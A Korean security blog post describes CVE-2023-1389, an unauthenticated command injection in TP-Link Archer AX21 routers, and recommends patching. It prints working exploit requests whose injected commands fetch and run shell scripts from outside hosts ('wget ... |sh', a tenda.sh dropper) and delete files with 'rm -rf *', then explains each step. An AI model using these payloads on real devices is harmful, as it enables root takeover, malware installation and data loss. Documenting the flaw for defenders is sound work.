TP-Link Archer 기가비트 인터넷 라우터에 대한 악용 시도(CVE-2023-1389)
- 1.1.4 빌드 20230219 이전의 P-Link Archer AX21(AX1800) 펌웨어 버전에는 웹 관리 인터페이스에서 /cgi-bin/luci;stok=/locale 엔드포인트의 국가 형식으로 명령 주입 취약점이 포함되어 있습니다.
- 특히, 쓰기 작업의 국가 매개변수는 popen() 호출에 사용되기 전에 삭제되지 않았으므로 인증되지 않은 공격자가 간단한 POST 요청을 통해 루트로 실행될 명령을 주입할 수 있습니다.
PoC 코드 / 샘플 코드
- 해당 PoC 코드를 직접 공격하여 악용하는 경우 법적 처벌 조치를 받으실 수 있습니다.
POST /cgi-bin/luci/;stok=/locale?form=country
HTTP/1.1Host: [redacted]
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 60
operation=write&country=$(id>`wget <http://zvub>[.]us/y -O-|sh`)
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm -rf *; cd /tmp; wget <http://192.3.152.183/tenda.sh>; chmod 777 tenda.sh; ./tenda.sh)
샘플 코드 설명
- m -rf *: 현재 디렉토리의 모든 파일 및 디렉토리를 삭제 (rm 명령어는 파일이나 디렉토리를 삭제하는 명령어이며, -rf 옵션은 강제로 삭제하고, 재귀적으로 하위 디렉토리까지 삭제하라는 옵션입니다.)
- cd /tmp: 임시 디렉토리로 이동.
- wget http://192.3.152.183/tenda.sh: 외부 서버에서 tenda.sh라는 스크립트를 다운로드
- chmod 777 tenda.sh: 다운로드한 스크립트에 실행 권한을 부여
- ./tenda.sh: 부여한 실행 권한으로 스크립트를 실행
- 현재까지 성공적인 인젝션이 관찰된 적이 없으므로, 주로 취약점이 존재하는지 유무를 확인하기 위한 스캔성 접근 다수 확인됨
- 출발지 IP 193.32.162.189, 185.224.128.10 (네덜란드)로부터 악용 시도에 적극적으로 참여하는 것으로 추정됨
- 해당 취약점이 수정된 공식 업데이트로 버전을 패치해야 합니다.
'CyberSecurity > 보안 취약점' 카테고리의 다른 글
| Deep Linking Vulnerabilities / 딥 링킹 취약점 (0) | 2024.02.14 |
|---|---|
| ThinkPHP 원격코드 실행 취약점 CVE-2018-20062 (0) | 2023.06.23 |
| Node.js Library(VM2) 보안 업데이트 권장 (CVE-2023-29017 취약점 확인) (0) | 2023.04.16 |
| Microsoft Outlook Elevation of Privilege Vulnerability [CVE-2023-23397] ZeroDay Attack 제로데이 취약점 (0) | 2023.03.18 |